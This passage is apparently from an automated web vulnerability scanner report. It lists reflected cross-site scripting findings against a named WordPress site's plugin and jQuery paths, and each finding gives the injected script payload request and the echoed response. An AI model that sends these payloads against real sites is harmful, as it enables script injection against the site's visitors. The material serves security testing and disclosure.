<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/wp-greet-box/jsad51d\"><script>alert(1)</script>5ca530811f6/functions.js" />
...[SNIP]...

4.312. http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/functions.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/wp-greet-box/js/functions.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57ecd"><script>alert(1)</script>b9142a98a09 was submitted in the REST URL parameter 6. This input was echoed as 57ecd\"><script>alert(1)</script>b9142a98a09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/wp-greet-box/js/functions.js57ecd"><script>alert(1)</script>b9142a98a09 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:10 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674590+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674590; expires=Thu, 02-Feb-2012 19:23:10 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/wp-greet-box/js/functions.js57ecd\"><script>alert(1)</script>b9142a98a09" />
...[SNIP]...

4.313. http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/js-mode.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/wp-greet-box/js/js-mode.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d991d"><script>alert(1)</script>e1f4eeb27fb was submitted in the REST URL parameter 1. This input was echoed as d991d\"><script>alert(1)</script>e1f4eeb27fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sited991d"><script>alert(1)</script>e1f4eeb27fb/wp-content/plugins/wp-greet-box/js/js-mode.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674586; expires=Thu, 02-Feb-2012 19:23:06 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:06 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/sited991d\"><script>alert(1)</script>e1f4eeb27fb/wp-content/plugins/wp-greet-box/js/js-mode.js" />
...[SNIP]...

4.314. http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/js-mode.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/wp-greet-box/js/js-mode.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dcbb"><script>alert(1)</script>2a34ec876cb was submitted in the REST URL parameter 2. This input was echoed as 9dcbb\"><script>alert(1)</script>2a34ec876cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content9dcbb"><script>alert(1)</script>2a34ec876cb/plugins/wp-greet-box/js/js-mode.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:07 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674587+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674587; expires=Thu, 02-Feb-2012 19:23:07 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content9dcbb\"><script>alert(1)</script>2a34ec876cb/plugins/wp-greet-box/js/js-mode.js" />
...[SNIP]...

4.315. http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/js-mode.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/wp-greet-box/js/js-mode.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11566"><script>alert(1)</script>61a3ae9d618 was submitted in the REST URL parameter 3. This input was echoed as 11566\"><script>alert(1)</script>61a3ae9d618 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins11566"><script>alert(1)</script>61a3ae9d618/wp-greet-box/js/js-mode.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:09 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674589+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674589; expires=Thu, 02-Feb-2012 19:23:09 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:09 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins11566\"><script>alert(1)</script>61a3ae9d618/wp-greet-box/js/js-mode.js" />
...[SNIP]...

4.316. http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/js-mode.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/wp-greet-box/js/js-mode.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55fe0"><script>alert(1)</script>4774902bb5d was submitted in the REST URL parameter 4. This input was echoed as 55fe0\"><script>alert(1)</script>4774902bb5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/wp-greet-box55fe0"><script>alert(1)</script>4774902bb5d/js/js-mode.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:10 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674590+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674590; expires=Thu, 02-Feb-2012 19:23:10 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/wp-greet-box55fe0\"><script>alert(1)</script>4774902bb5d/js/js-mode.js" />
...[SNIP]...

4.317. http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/js-mode.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/wp-greet-box/js/js-mode.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a63a"><script>alert(1)</script>48ff1601d51 was submitted in the REST URL parameter 5. This input was echoed as 7a63a\"><script>alert(1)</script>48ff1601d51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/wp-greet-box/js7a63a"><script>alert(1)</script>48ff1601d51/js-mode.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:11 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674591+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674592; expires=Thu, 02-Feb-2012 19:23:12 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:12 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/wp-greet-box/js7a63a\"><script>alert(1)</script>48ff1601d51/js-mode.js" />
...[SNIP]...

4.318. http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/js-mode.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/wp-greet-box/js/js-mode.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9a1b"><script>alert(1)</script>9fec7095d88 was submitted in the REST URL parameter 6. This input was echoed as b9a1b\"><script>alert(1)</script>9fec7095d88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/wp-greet-box/js/js-mode.jsb9a1b"><script>alert(1)</script>9fec7095d88 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:12 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674593+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674593; expires=Thu, 02-Feb-2012 19:23:13 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:13 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/wp-greet-box/js/js-mode.jsb9a1b\"><script>alert(1)</script>9fec7095d88" />
...[SNIP]...

4.319. http://wp-superslider.com/site/wp-includes/js/jquery/jquery.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b57e"><script>alert(1)</script>980c007698c was submitted in the REST URL parameter 1. This input was echoed as 8b57e\"><script>alert(1)</script>980c007698c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site8b57e"><script>alert(1)</script>980c007698c/wp-includes/js/jquery/jquery.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:08 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674588+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674589; expires=Thu, 02-Feb-2012 19:23:09 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:09 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site8b57e\"><script>alert(1)</script>980c007698c/wp-includes/js/jquery/jquery.js" />
...[SNIP]...

4.320. http://wp-superslider.com/site/wp-includes/js/jquery/jquery.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92397"><script>alert(1)</script>c46e27cc235 was submitted in the REST URL parameter 2. This input was echoed as 92397\"><script>alert(1)</script>c46e27cc235 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-includes92397"><script>alert(1)</script>c46e27cc235/js/jquery/jquery.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:09 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674590+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674590; expires=Thu, 02-Feb-2012 19:23:10 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-includes92397\"><script>alert(1)</script>c46e27cc235/js/jquery/jquery.js" />
...[SNIP]...

4.321. http://wp-superslider.com/site/wp-includes/js/jquery/jquery.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d415c"><script>alert(1)</script>2dc76faa4af was submitted in the REST URL parameter 3. This input was echoed as d415c\"><script>alert(1)</script>2dc76faa4af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-includes/jsd415c"><script>alert(1)</script>2dc76faa4af/jquery/jquery.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:11 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674591+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674591; expires=Thu, 02-Feb-2012 19:23:11 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:11 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-includes/jsd415c\"><script>alert(1)</script>2dc76faa4af/jquery/jquery.js" />
...[SNIP]...

4.322. http://wp-superslider.com/site/wp-includes/js/jquery/jquery.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4e83"><script>alert(1)</script>db25147c9c7 was submitted in the REST URL parameter 4. This input was echoed as d4e83\"><script>alert(1)</script>db25147c9c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-includes/js/jqueryd4e83"><script>alert(1)</script>db25147c9c7/jquery.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:12 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674592+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674593; expires=Thu, 02-Feb-2012 19:23:13 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:13 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-includes/js/jqueryd4e83\"><script>alert(1)</script>db25147c9c7/jquery.js" />
...[SNIP]...

4.323. http://wp-superslider.com/site/wp-includes/js/jquery/jquery.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9baba"><script>alert(1)</script>5354db22a2c was submitted in the REST URL parameter 5. This input was echoed as 9baba\"><script>alert(1)</script>5354db22a2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-includes/js/jquery/jquery.js9baba"><script>alert(1)</script>5354db22a2c HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:13 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674594+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674594; expires=Thu, 02-Feb-2012 19:23:14 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:14 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
